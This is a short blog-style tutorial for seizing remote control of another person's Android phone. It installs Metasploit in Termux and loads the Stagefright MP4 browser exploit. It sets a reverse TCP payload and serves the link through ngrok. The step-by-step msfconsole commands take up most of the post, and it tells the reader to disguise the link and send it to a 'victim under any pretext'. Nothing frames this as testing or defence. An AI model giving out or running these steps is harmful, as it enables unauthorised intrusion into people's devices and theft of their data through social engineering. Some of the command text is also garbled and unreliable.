We get access to the phone

 ðŸ”°  🔰


In this post we will talk about how to get full control over someone else's device with just one link. The most asked questions in my bot.


 A special utility Metasploit will help us with this, which perfectly copes with the vulnerabilities of old Android versions.


 Let's get started:


 1. First of all, install our utility in Termux:

  update

 apt upgrade

 pkg install unstable-repo

 pkg install Metasploit


 2. After that, run the utility:


 3. Now, if Stagefright is not in Metasploit, then download it from here → https://www.exploit-db.com/exploits/40436 ← and transfer it to the exploit folder.


 4. After that we prescribe:

 msfconsole - open console

 use exploit / android / browser / stagefright_mp4_tx3g_64bit - connect exploit

 set SRVHOST yourIP

  URIPATH /

 set PAYLOAD linux / armle / mettle / reverse_tcp

 set LHOST yourIP

 set VERBOSE true

 exploit -j - launch an exploit


 A special link will be generated for us.  We wrap it in ngrok, mask it at will and send it to the victim under any pretext.  When the victim clicks on it, we will get remote access to the device.

No comments:

Post a Comment

How to Install files and the database in MAMP Server.mp4

  Download now   Enjoy! Follow us for more...